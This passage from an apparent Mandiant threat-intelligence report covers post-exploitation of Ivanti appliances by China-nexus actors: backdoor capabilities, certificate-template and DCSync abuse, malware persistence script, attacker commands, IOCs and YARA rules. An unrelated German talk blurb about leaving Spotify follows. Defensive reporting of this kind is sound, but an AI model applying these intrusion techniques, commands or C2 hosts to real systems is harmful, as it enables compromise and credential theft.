<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div><table border="1px" cellpadding="16px"><colgroup><col><col></colgroup>
<tbody>
<tr>
<td>
<p><strong>Function</strong></p>
</td>
<td>
<p><strong>Comments</strong></p>
</td>
</tr>
<tr>
<td>
<p><span>Spawning a web server</span></p>
</td>
<td>
<p><span>See below for accepted routes/endpoints</span></p>
</td>
</tr>
<tr>
<td>
<p><span>Command execution</span></p>
</td>
<td>
<p><span>Executes shell commands using </span><code>/bin/sh</code></p>
</td>
</tr>
<tr>
<td>
<p><span>Command execution (“NoContext”)</span></p>
</td>
<td>
<p><span>Executes shell commands using calls to os. </span><code>Exec</code></p>
<p><span>likely accepts commands </span><code>run_shell</code><span> and </span><code>exit</code></p>
</td>
</tr>
<tr>
<td>
<p><span>SOCKS relaying</span></p>
</td>
<td>
<p><span>Connection proxying</span></p>
</td>
</tr>
</tbody>
</table></div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
<p><span><span>Table 1: </span><code>wssoft</code><span> capabilities</span></span></p>
<p><span>When the backdoor functionality is activated, it spawns a web server to handle incoming commands. It uses </span><a href="https://github.com/gorilla/mux" rel="noopener" target="_blank"><span>Gorilla/mux</span></a><span> to handle the endpoint routing and </span><a href="https://github.com/lonng/nex" rel="noopener" target="_blank"><span>lonnng/nex</span></a><span> to marshal the data into JSON.</span></p>
<p><span>Table 2 provides the endpoints used for communications to the BRICKSTORM backdoor via POST requests.<br><br></span></p>
<div align="left">
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div><table border="1px" cellpadding="16px"><colgroup><col><col></colgroup>
<tbody>
<tr>
<td>
<p><strong>Endpoint</strong></p>
</td>
<td>
<p><strong>Function</strong></p>
</td>
</tr>
<tr>
<td>
<p><code>/api/file/change-dir</code></p>
</td>
<td>
<p><span>Change directory</span></p>
</td>
</tr>
<tr>
<td>
<p><code>/api/file/delete-dir</code></p>
</td>
<td>
<p><span>Deletes a directory</span></p>
</td>
</tr>
<tr>
<td>
<p><code>/api/file/delete-file</code></p>
</td>
<td>
<p><span>Deletes a file</span></p>
</td>
</tr>
<tr>
<td>
<p><code>/api/file/mkdir</code></p>
</td>
<td>
<p><span>Makes a directory (create subdirectories as necessary)</span></p>
</td>
</tr>
<tr>
<td>
<p><code>/api/file/list-dir</code></p>
</td>
<td>
<p><span>Lists directory contents</span></p>
</td>
</tr>
<tr>
<td>
<p><code>/api/file/rename</code></p>
</td>
<td>
<p><span>Renames a file</span></p>
</td>
</tr>
<tr>
<td>
<p><code>/api/file/put-file</code></p>
</td>
<td>
<p><span>File upload given a destination path, can optionally append to file</span></p>
</td>
</tr>
<tr>
<td>
<p><code>/api/file/get-file</code></p>
</td>
<td>
<p><span>File download</span></p>
</td>
</tr>
<tr>
<td>
<p><code>/api/file/slice-up</code></p>
</td>
<td>
<p><span>May upload large files in separate chunks</span></p>
</td>
</tr>
<tr>
<td>
<p><code>/api/file/file-md5</code></p>
</td>
<td>
<p><span>Calculates file MD5</span></p>
</td>
</tr>
<tr>
<td>
<p><code>/api/file/up</code></p>
</td>
<td>
<p><span>Uploads a file using a web form (includes SHA256 hashing)</span></p>
</td>
</tr>
<tr>
<td>
<p><code>/api/file/stat</code></p>
</td>
<td>
<p><span>Gets file information</span></p>
</td>
</tr>
</tbody>
</table></div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
<p><span>Table 2: BRICKSTORM endpoints</span></p></div>
<div class="block-paragraph_advanced"><h3><span>Lateral Movement Leading to Active Directory Compromise</span></h3>
<p><span>UNC5330 gained initial access to the victim environment by chaining together CVE-2024-21893 and CVE-2024-21887, a tactic outlined in </span><a href="https://cloud.google.com/blog/topics/threat-intelligence/investigating-ivanti-exploitation-persistence"><span>Cutting Edge Part 3</span></a><span>. Shortly after gaining access, UNC5330 leveraged an LDAP bind account configured on the compromised Ivanti Connect Secure appliance to abuse a vulnerable Windows Certificate Template, created a computer object, and requested a certificate for a domain administrator. The threat actor then impersonated the domain administrator to perform subsequent DCSyncs to extract additional credential material to move laterally.</span></p>
<h4><span>Attack Path Diagram</span></h4></div>
<div class="block-image_full_width">






  
    <div class="article-module h-c-page">
      <div class="h-c-grid">
  

    <figure class="article-image--large
      
      
        h-c-grid__col
        h-c-grid__col--6 h-c-grid__col--offset-3
        
        
      ">

      
      
        
        <img src="https://storage.googleapis.com/gweb-cloudblog-publish/images/cutting-edge4-fig4.max-1000x1000.png" alt="UNC5330 attack path diagram">
        
        
      
        <figcaption class="article-image__caption "><p data-block-key="mx14r">Figure 4: UNC5330 attack path diagram</p></figcaption>
      
    </figure>

  
      </div>
    </div>
  




</div>
<div class="block-paragraph_advanced"><h4><span>Windows Certificate Template Abuse </span></h4>
<p><span>UNC5330 used the </span><code>ldap-ivanti</code><span> account, configured on the Ivanti appliance for LDAP bind operations, to create a domain computer object, </span><code>testComputer$</code><span>. UNC5330 used the newly created </span><code>testComputer$</code><span> computer object to request a certificate from a vulnerable certificate template that provided enrollment rights to </span><code>Domain Computers</code><span>. UNC5330 requested a certificate for a domain administrator account, obtained a Kerberos TGT using the certificate, and performed DCSync attacks to obtain additional domain credentials for enabling lateral movement.</span></p>
<p><span>Once domain admin access was achieved, UNC5330 leveraged WMI to deploy the TONERJAM launcher and the PHANTOMNET backdoor.</span></p>
<h4><span>WMI Event Consumers</span></h4>
<p><span>WMI was used to perform lateral movement and establish persistence within the victim environment, primarily by creating and executing scheduled tasks that were subsequently removed. The ActiveScript event consumers performed the following:</span></p>
<ol>
<li aria-level="1">
<p role="presentation"><span>Created and registered a scheduled task with trigger type 7 (started the task upon registration) to execute command with </span><code>cmd.exe</code><span>.</span></p>
</li>
<li aria-level="1">
<p role="presentation"><span>Wrote command output to a </span><code>.log</code><span> file in </span><code>C:\Windows\Temp</code><span>.</span></p>
</li>
<li aria-level="1">
<p role="presentation"><span>Deleted the scheduled task.</span></p>
</li>
</ol>
<p><span>The behavior, as well as the naming convention used for both the WMI artifacts and output files, is consistent with a recent version of CrackMapExec that implements DCE/RPC for WMI execution that does not rely on SMB. Mandiant observed this technique being used to deploy TONERJAM and PHANTOMNET.</span></p>
<h4><span>TONERJAM</span></h4>
<p><span>TONERJAM is a launcher that decrypts and executes a shellcode payload, in this case PHANTOMNET, stored as an encrypted local file and decrypts it using an AES key derived from a SHA hash of the final 16 bytes of the encrypted payload. TONERJAM maintains persistence via the Run registry key or by hijacking COM objects depending on the permissions granted to it upon execution.</span></p>
<h4><span>PHANTOMNET</span></h4>
<p><span>PHANTOMNET is a modular backdoor that communicates using a custom communication protocol over TCP. PHANTOMNET's core functionality involves expanding its capabilities through a plugin management system. The downloaded plugins are mapped directly into memory and executed.</span></p>
<h3><span>SLIVER C2</span></h3>
<p><span>During a separate intrusion, UNC5266 retrieved copies of SLIVER from a Python SimpleHTTP server hosted on the same IP address as the configured command-and-control server. The copies of SLIVER were placed in three separate locations on the compromised appliance, attempting to masquerade as legitimate system files. UNC5266 modified a </span><code>systemd</code><span> service file to register one of the copies of SLIVER as a persistent daemon.<br><br></span></p>
<div align="left">
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div><table border="1px" cellpadding="16px"><colgroup><col><col></colgroup>
<tbody>
<tr>
<td>
<p><strong>Path</strong></p>
</td>
<td>
<p><strong>Description</strong></p>
</td>
</tr>
<tr>
<td>
<p><code>/home/bin/netmon</code></p>
</td>
<td>
<p><span>SLIVER</span></p>
</td>
</tr>
<tr>
<td>
<p><code>/home/bin/logd</code></p>
</td>
<td>
<p><span>SLIVER</span></p>
</td>
</tr>
<tr>
<td>
<p><code>/home/runtime/logd</code></p>
</td>
<td>
<p><span>SLIVER</span></p>
</td>
</tr>
<tr>
<td>
<p><code>/home/config/logd.spec.cfg</code></p>
</td>
<td>
<p><code>systemd</code><span> service unit configuration file</span></p>
</td>
</tr>
</tbody>
</table></div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
<p><span>Table 3: SLIVER components</span></p>
<p><span>Additionally, UNC5266 leveraged a WARPWIRE variant previously reported in </span><a href="https://www.mandiant.com/resources/blog/investigating-ivanti-zero-day-exploitation" rel="noopener" target="_blank"><span>Cutting Edge, Part 2</span></a><span>. This variant was downloaded by UNC5266 from what Mandiant believes to be a compromised web server located in Rwanda. See Figure 18 in the Cutting Edge Part 2 blog for details on the WARPWIRE variant.</span></p>
<h3><span>TERRIBLETEA</span></h3>
<p><span>At a separate intrusion, UNC5266 used the same WARPWIRE sample as used in their SLIVER operation. However, instead of SLIVER, UNC5266 deployed a Go backdoor that Mandiant has named TERRIBLETEA. During this intrusion, the actor attempted to use </span><code>curl</code><span> to download the backdoor; however, logs suggest these attempts failed. Seven minutes after their last failed </span><code>curl</code><span> attempt, UNC5266 ran a </span><code>wget</code><span> request to an anonymous file sharing site:</span><code> pan.xj.hk</code><span>. UNC5266 likely uploaded TERRIBLETEA to the file-sharing site in the intervening seven minutes.</span></p>
<p><span>TERRIBLETEA is a Go backdoor that communicates over HTTP using XXTEA for encrypted communications. It is built using multiple open-source Go modules and has a multitude of capabilities including:</span></p>
<ul>
<li aria-level="1">
<p role="presentation"><span>Command execution</span></p>
</li>
<li aria-level="1">
<p role="presentation"><span>Keystroke logging</span></p>
</li>
<li aria-level="1">
<p role="presentation"><span>SOCKS5 proxy</span></p>
</li>
<li aria-level="1">
<p role="presentation"><span>Port scanning</span></p>
</li>
<li aria-level="1">
<p role="presentation"><span>File system interaction</span></p>
</li>
<li aria-level="1">
<p role="presentation"><span>SQL query execution</span></p>
</li>
<li aria-level="1">
<p role="presentation"><span>Screen captures</span></p>
</li>
<li aria-level="1">
<p role="presentation"><span>Ability to open a new SSH session, execute commands, and upload files to a remote server. The following commands may be executed:</span></p>
</li>
<ul>
<li aria-level="2">
<p role="presentation"><code>chmod +x /tmp/.udevd</code></p>
</li>
<li aria-level="2">
<p role="presentation"><code>/tmp/.udevd &lt;args&gt;</code></p>
</li>
<li aria-level="2">
<p role="presentation"><code>ls -lahrt /home/</code></p>
</li>
</ul>
</ul>
<p><span><span>TERRIBLETEA can take different execution paths depending on what environment it is configured for, either </span><code>linux_amd64</code><span> or </span><code>darwin_amd64</code><span>. In this instance, TERRIBLETEA is configured for the </span><code>linux_amd64</code><span> environment. The sample persists with a Bash profile script located at </span><code>/etc/profile.d/cron.sh</code><span> for persistence.</span></span></p></div>
<div class="block-paragraph_advanced"><pre class="language-plain"><code># Initialization script for bash and sh
# export AFS if you are in AFS environment
a=`ps -fe|grep /bin/cron |grep -v grep|wc|awk '{print$1}'`
if [ "$a" -eq 0 ] 
then
/bin/cron
fi</code></pre>
<p><span><span>Figure 5: TERRIBLETEA Bash profile script</span></span></p></div>
<div class="block-paragraph_advanced"><h2><span>Outlook and Implications</span></h2>
<p><span>The activity detailed in this blog, as well as the recently published </span><a href="https://cloud.google.com/blog/topics/threat-intelligence/investigating-ivanti-exploitation-persistence"><span>Cutting Edge, Part 3</span></a><span> highlighting UNC5325 targeting of Ivanti Connect Secure appliances, underscore the threat faced by edge appliances. Mandiant continues to observe China-nexus threat actors aggressively utilizing zero-day and N-day vulnerabilities to enable their operations and target organizations across the globe. </span></p>
<p><span>Mandiant continues to observe a wide range of TTPs following the successful exploitation of vulnerabilities against edge appliances. As previously </span><span>reported</span><span> by Mandiant, <a href="https://cloud.google.com/blog/topics/threat-intelligence/chinese-espionage-tactics">China-nexus actors continue to evolve their stealth to avoid detection by defenders</a>. While the use of open--source tooling is somewhat common, Mandiant continues to observe actors leveraging custom malware that is tailored to the appliance or environment the actor is targeting.</span></p>
<h2><span>Indicators of Compromise (IOCs)</span></h2>
<h3><span>Host-Based Indicators (HBIs)</span></h3>
<div align="left">
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div><table border="1px" cellpadding="16px"><colgroup><col><col><col></colgroup>
<thead>
<tr>
<th scope="col">
<p><strong>Filename</strong></p>
</th>
<th scope="col">
<p><strong>MD5</strong></p>
</th>
<th scope="col">
<p><strong>Description</strong></p>
</th>
</tr>
</thead>
<tbody>
<tr>
<td>
<p><code>data.dat</code></p>
</td>
<td>
<p><span>9d684815bc96508b99e6302e253bc292</span></p>
</td>
<td>
<p><span>PHANTOMNET</span></p>
</td>
</tr>
<tr>
<td>
<p><code>epdevmgr.dll</code></p>
</td>
<td>
<p><span>b210a9a9f3587894e5a0f225b3a6519f</span></p>
</td>
<td>
<p><span>TONERJAM</span></p>
</td>
</tr>
<tr>
<td>
<p><code>libdsproxy.so</code></p>
</td>
<td>
<p><span>4f79c70cce4207d0ad57a339a9c7f43c</span></p>
</td>
<td>
<p><span>SPAWNMOLE</span></p>
</td>
</tr>
<tr>
<td>
<p><code>libdsmeeting.so</code></p>
</td>
<td>
<p><span>e7d24813535f74187db31d4114f607a1</span></p>
</td>
<td>
<p><span>SPAWNSNAIL</span></p>
</td>
</tr>
<tr>
<td>
<p><code>.liblogblock.so</code></p>
</td>
<td>
<p><span>4acfc5df7f24c2354384f7449280d9e0 </span></p>
</td>
<td>
<p><span>SPAWNSLOTH</span></p>
</td>
</tr>
<tr>
<td>
<p><code>.dskey</code></p>
</td>
<td>
<p><span>3ef30bc3a7e4f5251d8c6e1d3825612d</span></p>
</td>
<td>
<p><span>SPAWNSNAIL private key</span></p>
</td>
</tr>
<tr>
<td>
<p><span>N/A</span></p>
</td>
<td>
<p><span>bb3b286f88728060c80ea65993576ef8</span></p>
</td>
<td>
<p><span>TERRIBLETEA</span></p>
</td>
</tr>
<tr>
<td>
<p><span>N/A</span></p>
</td>
<td>
<p><span>cfca610934b271c26437c4ce891bad00</span></p>
</td>
<td>
<p><span>TERRIBLETEA</span></p>
</td>
</tr>
<tr>
<td>
<p><span>N/A</span></p>
</td>
<td>
<p><span>08a817e0ae51a7b4a44bc6717143f9c2</span></p>
</td>
<td>
<p><span>TERRIBLETEA</span></p>
</td>
</tr>
<tr>
<td>
<p><code>linb64.png</code></p>
</td>
<td>
<p><span>e7fdbed34f99c05bb5861910ca4cc994</span></p>
</td>
<td>
<p><span>SLIVER</span></p>
</td>
</tr>
<tr>
<td>
<p><code>lint64.png</code></p>
</td>
<td>
<p><span>c251afe252744116219f885980f2caea</span></p>
</td>
<td>
<p><span>SLIVER</span></p>
</td>
</tr>
<tr>
<td>
<p><code>linb64.png</code></p>
</td>
<td>
<p><span>4f68862d3170abd510acd5c500e43548</span></p>
</td>
<td>
<p><span>SLIVER</span></p>
</td>
</tr>
<tr>
<td>
<p><code>lint64.png</code></p>
</td>
<td>
<p><span>9d0b6276cbc4c8b63c269e1ddc145008</span></p>
</td>
<td>
<p><span>SLIVER</span></p>
</td>
</tr>
<tr>
<td>
<p><span>logd</span></p>
</td>
<td>
<p><span>71b4368ef2d91d49820c5b91f33179cb</span></p>
</td>
<td>
<p><span>SLIVER</span></p>
</td>
</tr>
<tr>
<td>
<p><code>winb64.png</code></p>
</td>
<td>
<p><span>d88bbed726d79124535e8f4d7de5592e</span></p>
</td>
<td>
<p><span>SLIVER</span></p>
</td>
</tr>
<tr>
<td>
<p><code>logd.spec.cfg</code></p>
</td>
<td>
<p><span>846369b3a3d4536008a6e1b92ed09549</span></p>
</td>
<td>
<p><span>SLIVER persistence</span></p>
</td>
</tr>
<tr>
<td>
<p><code>N/A</code></p>
</td>
<td>
<p><span>8e429d919e7585de33ea9d7bb29bc86b</span></p>
</td>
<td>
<p><span>SLIVER downloader</span></p>
</td>
</tr>
<tr>
<td>
<p><span>N/A</span></p>
</td>
<td>
<p><span>fc1a8f73010f401d6e95a42889f99028</span></p>
</td>
<td>
<p><span>PHANTOMNET</span></p>
</td>
</tr>
<tr>
<td>
<p><span>N/A</span></p>
</td>
<td>
<p><span>e72efc0753e6386fbca0a500836a566e</span></p>
</td>
<td>
<p><span>PHANTOMNET</span></p>
</td>
</tr>
<tr>
<td>
<p><span>N/A</span></p>
</td>
<td>
<p><span>4645f2f6800bc654d5fa812237896b00</span></p>
</td>
<td>
<p><span>BRICKSTORM</span></p>
</td>
</tr>
</tbody>
</table></div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
<p><span>Table 4: Host-based indicators</span></p>
<h3><span>Network-Based Indicators (NBIs)</span></h3>
<div align="left">
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div><table border="1px" cellpadding="16px"><colgroup><col><col><col></colgroup>
<thead>
<tr>
<th scope="col">
<p><strong>Network Indicator</strong></p>
</th>
<th scope="col">
<p><strong>Type</strong></p>
</th>
<th scope="col">
<p><strong>Description</strong></p>
</th>
</tr>
</thead>
<tbody>
<tr>
<td>
<p><code>8.218.240[.]85</code></p>
</td>
<td>
<p><span>IPv4</span></p>
</td>
<td>
<p><span>Post-exploitation activity</span></p>
</td>
</tr>
<tr>
<td>
<p><code>98.142.138[.]21</code></p>
</td>
<td>
<p><span>IPv4</span></p>
</td>
<td>
<p><span>Post-exploitation activity</span></p>
</td>
</tr>
<tr>
<td>
<p><code>103.13.28[.]40</code></p>
</td>
<td>
<p><span>IPv4</span></p>
</td>
<td>
<p><span>Post-exploitation activity</span></p>
</td>
</tr>
<tr>
<td>
<p><code>103.27.110[.]83</code></p>
</td>
<td>
<p><span>IPv4</span></p>
</td>
<td>
<p><span>Post-exploitation activity</span></p>
</td>
</tr>
<tr>
<td>
<p><code>103.73.66[.]37</code></p>
</td>
<td>
<p><span>IPv4</span></p>
</td>
<td>
<p><span>Post-exploitation activity</span></p>
</td>
</tr>
<tr>
<td>
<p><code>193.149.129[.]191</code></p>
</td>
<td>
<p><span>IPv4</span></p>
</td>
<td>
<p><span>Post-exploitation activity</span></p>
</td>
</tr>
<tr>
<td>
<p><code>206.188.196[.]199</code></p>
</td>
<td>
<p><span>IPv4</span></p>
</td>
<td>
<p><span>Post-exploitation activity</span></p>
</td>
</tr>
<tr>
<td>
<p><code>oast[.]fun</code></p>
</td>
<td>
<p><span>Domain</span></p>
</td>
<td>
<p><span>Pre-exploitation validation</span></p>
</td>
</tr>
<tr>
<td>
<p><code>cpanel.netbar[.]org</code></p>
</td>
<td>
<p><span>Domain</span></p>
</td>
<td>
<p><span>WARPWIRE Variant C2 server</span></p>
</td>
</tr>
<tr>
<td>
<p><code>pan.xj[.]hk</code></p>
</td>
<td>
<p><span>Domain</span></p>
</td>
<td>
<p><span>Post-exploitation activity</span></p>
</td>
</tr>
<tr>
<td>
<p><code>akapush.us[.]to</code></p>
</td>
<td>
<p><span>Domain</span></p>
</td>
<td>
<p><span>SLIVER C2 server</span></p>
</td>
</tr>
<tr>
<td>
<p><code>opra1.oprawh.workers.dev</code></p>
</td>
<td>
<p><span>Domain</span></p>
</td>
<td>
<p><span>BRICKSTORM C2 server</span></p>
</td>
</tr>
</tbody>
</table></div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
<p><span>Table 5: Network-based indicators</span></p>
<h3><span>YARA Rules</span></h3></div>
<div class="block-paragraph_advanced"><pre class="language-plain"><code>rule M_Hunting_Webshell_ROOTROT_1 {
  meta:
    author = "Mandiant"
    description = "This rule detects ROOTROT, a web shell written in 
Perl that is embedded into a legitimate Pulse Secure .ttc file to 
enable arbitrary command execution."
    md5 = "c7ffd2c06e9b7e8e0b7ac92a0dbe3294"
  strings:
    $s1 = "use MIME::Base64" ascii
    $s2 = {6d 79 20 24 61 72 67 3d 64 65 63 6f 64 65 5f 62 61 73 
65 36 34 28 22 24 6b 65 79 22 29}
    $s3 = {24 6f 75 74 70 75 74 20 2e 3d 20 22 3c 21 2d 2d 5c 6e 
22 3b}
    $s4 = {22 3c 2f 62 6f 64 79 3e 5c 6e 5c 6e 3c 2f 68 74 6d 6c 3e 
5c 6e 22}
  condition:
    filesize &lt; 4KB
    and all of them
}
</code></pre></div>
<div class="block-paragraph_advanced"><pre class="language-plain"><code>rule M_Hunting_Backdoor_BRICKSTORM_1 {
  meta:
    author = "Mandiant"
    created = "2024-01-30"
    md5 = "4645f2f6800bc654d5fa812237896b00"
    descr = "Hunting rule looking for BRICKSTORM golang backdoor samples"
  strings:
    $v1 = "/home/vsphere-ui/vcli" ascii wide
    $v2 = "/opt/vmware/sbin" ascii wide
    $v3 = "/opt/vmware/sbin/vami-httpd" ascii wide
    $s1 = "github.com/gorilla/mux" ascii wide
    $s2 = "WRITE_LOG=true" ascii wide
    $s3 = "wssoft" ascii wide
    
  condition:
    uint32(0) == 0x464c457f and filesize &lt; 6MB and 1 of ($v*) and 2 of ($s*)
}</code></pre></div>
<div class="block-paragraph_advanced"><pre class="language-plain"><code>import "pe"
rule M_APT_Backdoor_Win_PHANTOMNET_1
{
    meta:
        author = "Mandiant"
        md5 = "59f4d38a5caafbc94673c6d488bf37e3"

    strings:
        $phantomnet = /\\PhantomNet-\w{1,10}\.pdb/ ascii nocase
    condition:
        (uint16(0) == 0x5A4D) and (uint32(uint32(0x3C)) == 0x00004550) 
and all of them
}
</code></pre></div>
<div class="block-paragraph_advanced"><pre class="language-plain"><code>rule M_APT_Backdoor_SLIVER_1
{
    meta:
        Author = “Mandiant”
        description = "Detects Windows, MacOS and ELF variants 
of the Sliver implant framework"
        md5 = "5ecd0c38501dfb02b682cec0a2d93aa9"

    strings:
        $s1 = ".InvokeSpawnDllReq"
        $s2 = ".(*InvokeSpawnDllReq).Reset"
        $s3 = ".(*InvokeSpawnDllReq).ProtoMessage"
        $s4 = ".(*InvokeSpawnDllReq).ProtoReflect"
        $s5 = ".(*InvokeSpawnDllReq).Descriptor"
        $s6 = ".(*InvokeSpawnDllReq).GetData"
        $s7 = ".(*InvokeSpawnDllReq).GetProcessName"
        $s8 = ".(*InvokeSpawnDllReq).GetArgs"
        $s10 = ".(*InvokeSpawnDllReq).GetKill"
        $s11 = ".(*InvokeSpawnDllReq).GetPPid"
        $s12 = ".(*InvokeSpawnDllReq).GetProcessArgs"
        $s13 = ".(*InvokeSpawnDllReq).GetRequest"
        $s14 = ".(*InvokeSpawnDllReq).String"
        $s15 = ".(*InvokeSpawnDllReq).GetEntryPoint"

    condition:
        ((uint16(0) == 0x5a4d and uint32(uint32(0x3C)) == 0x00004550) 
or uint32(0) == 0x464c457f or (uint32(0) == 0xBEBAFECA or uint32(0) 
== 0xFEEDFACE or uint32(0) == 0xFEEDFACF or uint32(0) == 0xCEFAEDFE)) 
and 5 of ($s*)
}
</code></pre></div>
<div class="block-paragraph_advanced"><pre class="language-plain"><code>rule M_APT_Backdoor_TERRIBLETEA_1 {
    meta:
        author = "Mandiant"
        description = "This rule is designed to detect on events related 
to terribletea. TERRIBLETEA is a backdoor written in Go that communicates 
over HTTP. Its many capabilities include shell command execution, 
capturing screens, keystroke logging, port scanning, enumerating files, 
starting a SOCKS5 proxy and new SSH session, downloading files, and 
executing SQL queries."
        md5 = "bb3b286f88728060c80ea65993576ef8"
    
    strings:
        $code_part_of_getcommand = {48 BA 44 61 74 61 31 73 33 6E 
[1-12] 80 7B ?? 64}
        $code_get_task = { 48 8D  [5] B9 04 00 00 00 48 8B ?? 24 [4] 48 
8D [5] 41 B8 03 00 00 00 E8}
        $func1 = "SendRequest" fullword
        $func2 ="UploadResult"
        $func3 ="Online"
        $func4 ="GetCommond"
    condition:
        all of ($code*) and any of ($func*) and filesize&lt;20MB  
}
</code></pre></div>
<div class="block-paragraph_advanced"><pre class="language-plain"><code>rule M_Launcher_TONERJAM_1
{
    meta:
        author = "Mandiant"
        description = "This rule detects TONERJAM, a launcher that 
decrypts and executes a shellcode payload stored as an encrypted 
local file and decrypts it using an AES key derived from a SHA hash 
of the final 16 bytes of the encrypted payload."

    strings:
        $p00_0 = {e9[4]488b41??668338??75??4883c0??488941??b8[4]eb??b8}
        $p00_1 = {8030??488d40??41ffc14183f9??72??ba[4]488d4c24??e8[4]488d0d}

    condition:
        uint16(0) == 0x5A4D and uint32(uint32(0x3C)) == 0x00004550 and
        (
            ($p00_0 in (17000..28000) and $p00_1 in (3700..14000))
        )
}
</code></pre></div>
<div class="block-paragraph_advanced"><pre class="language-plain"><code>rule M_APT_Installer_SPAWNSNAIL_1
{ 
    meta: 
        author = "Mandiant" 
        description = "Detects SPAWNSNAIL. SPAWNSNAIL is an SSH 
backdoor targeting Ivanti devices. It has an ability to inject a specified 
binary to other process, running local SSH backdoor when injected to 
dsmdm process, as well as injecting additional malware to dslogserver" 
        md5 = "e7d24813535f74187db31d4114f607a1"
  
    strings: 
        $priv = "PRIVATE KEY-----" ascii fullword
        
        $key1 = "%d/id_ed25519" ascii fullword
        $key2 = "%d/id_ecdsa" ascii fullword
        $key3 = "%d/id_rsa" ascii fullword
        
        $sl1 = "[selinux] enforce" ascii fullword
        $sl2 = "DSVersion::getReleaseStr()" ascii fullword
        
        $ssh1 = "ssh_set_server_callbacks" ascii fullword
        $ssh2 = "ssh_handle_key_exchange" ascii fullword
        $ssh3 = "ssh_add_set_channel_callbacks" ascii fullword
        $ssh4 = "ssh_channel_close" ascii fullword
    
    condition: 
        uint32(0) == 0x464c457f and $priv and any of ($key*) 
and any of ($sl*) and any of ($ssh*)
} </code></pre></div>
<div class="block-paragraph_advanced"><pre class="language-plain"><code>rule M_APT_Installer_SPAWNANT_1
{ 
    meta: 
        author = "Mandiant" 
        description = "Detects SPAWNANT. SPAWNANT is an 
Installer targeting Ivanti devices. Its purpose is to persistently 
install other malware from the SPAWN family (SPAWNSNAIL, 
SPAWNMOLE) as well as drop additional webshells on the box." 
  
    strings: 
        $s1 = "dspkginstall" ascii fullword
        $s2 = "vsnprintf" ascii fullword
        $s3 = "bom_files" ascii fullword
        $s4 = "do-install" ascii
        $s5 = "ld.so.preload" ascii
        $s6 = "LD_PRELOAD" ascii
        $s7 = "scanner.py" ascii
        
    condition: 
        uint32(0) == 0x464c457f and 5 of ($s*)
}
</code></pre></div>
<div class="block-paragraph_advanced"><pre class="language-plain"><code>rule M_APT_Tunneler_SPAWNMOLE_1
{ 
    meta: 
        author = "Mandiant" 
        description = "Detects a specific comparisons in SPAWNMOLE 
tunneler, which allow malware to filter put its own traffic . 
SPAWNMOLE is a tunneler written in C and compiled as an ELF32 
executable. The sample is capable of hijacking a process on the 
compromised system with a specific name and hooking into its 
communication capabilities in order to create a proxy server for 
tunneling traffic." 
        md5 = "4f79c70cce4207d0ad57a339a9c7f43c"
  
    strings: 
        /*
        3C 16                                cmp     al, 16h
        74 14                                jz      short loc_5655C038
        0F B6 45 C1                          movzx   eax, [ebp+var_3F]
        3C 03                                cmp     al, 3
        74 0C                                jz      short loc_5655C038
        0F B6 45 C5                          movzx   eax, [ebp+var_3B]
        3C 01                                cmp     al, 1
        0F 85 ED 00 00 00                    jnz     loc_5655C125
        */


        $comparison1 = { 3C 16 74 [1] 0F B6 [2] 3C 03 74 [1] 0F B6 [2] 
3C 01 0F 85 }

        /*
        81 7D E8 E2 E3 49 FB                 cmp     [ebp+var_18], 0FB49E3E2h
        0F 85 CD 00 00 00                    jnz     loc_5655C128
        81 7D E4 61 83 C3 1B                 cmp     [ebp+var_1C], 1BC38361h
        0F 85 C0 00 00 00                    jnz     loc_5655C128
        */

        $comparison2 = { 81 [2] E2 E3 49 FB 0F 85 [4] 81 [2] 61 83 C3 
1B 0F 85}
        
  
    condition: 
        uint32(0) == 0x464c457f and all of them
}
</code></pre></div>
<div class="block-paragraph_advanced"><pre class="language-plain"><code>rule M_APT_Utility_SPAWNSLOTH_1
{ 
    meta: 
        author = "Mandiant" 
        description = "Detects SPAWNSLOTH. SPAWNSLOTH 
is an Utility targeting Ivanti devices. Its purpose is to work 
together with SPAWNSNAIL and block logging via dslogserver 
process when SPAWNSNAIL backdoor is active." 
        md5 = "4acfc5df7f24c2354384f7449280d9e0"
  
    strings: 
        $dslog = "dslogserver" ascii fullword

        $hook1 = "g_do_syslog_servers_exist" ascii fullword
        $hook2 = "_ZN5DSLog4File3addEPKci" ascii fullword
        $hook3 = "funchook_create" ascii fullword
    
    condition: 
        uint32(0) == 0x464c457f and all of them
}
</code></pre></div>]]></content:encoded>
</item>
<item>
<title><![CDATA[De-Spotify Yourself - Warum Du von $Streamingdienst weg willst und wie/wohin (gpn24)]]></title>
<description><![CDATA[In diesem Talk behandeln wir Gründe von verschiedenen Musik- und Podcast-Streamingdiensten wegzumigrieren und schauen uns mögliche automatische Unterstützung und Alternativen (am Beispiel Spotify) an.

Im Rahmen meiner Großoffensive mich unabhängig(er) von Big Tech zu machen, musste zuletzt Spoti...]]></description>
<link>https://tsecurity.de/de/3578431/it-security-video/de-spotify-yourself-warum-du-von-streamingdienst-weg-willst-und-wiewohin-gpn24/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3578431/it-security-video/de-spotify-yourself-warum-du-von-streamingdienst-weg-willst-und-wiewohin-gpn24/</guid>
<pubDate>Sun, 07 Jun 2026 00:17:03 +0200</pubDate>
<category>🎥 IT Security Video</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[In diesem Talk behandeln wir Gründe von verschiedenen Musik- und Podcast-Streamingdiensten wegzumigrieren und schauen uns mögliche automatische Unterstützung und Alternativen (am Beispiel Spotify) an.

Im Rahmen meiner Großoffensive mich unabhängig(er) von Big Tech zu machen, musste zuletzt Spotify dran glauben. 

In diesem Talk erzähle ich Euch zunächst wieso (nein, es ist nicht nur Enshittyfication und Big-Tech böse).
Danach schauen wir uns an welche Alternativen es selfhosted gibt, wie gut ich sie finde, und welche ich jetzt benutze.

Außerdem gibt es einen Git-Link zu den Scripten, die ich dafür geschrieben habe und eine kurze Erklärung wie Ihr Eure Spotify Playlists auf mp3s, die Ihr von physischen Alben, die Ihr besitzt, gezogen habt, mappen könnt :)

Licensed to the public under https://creativecommons.org/licenses/by/4.0/
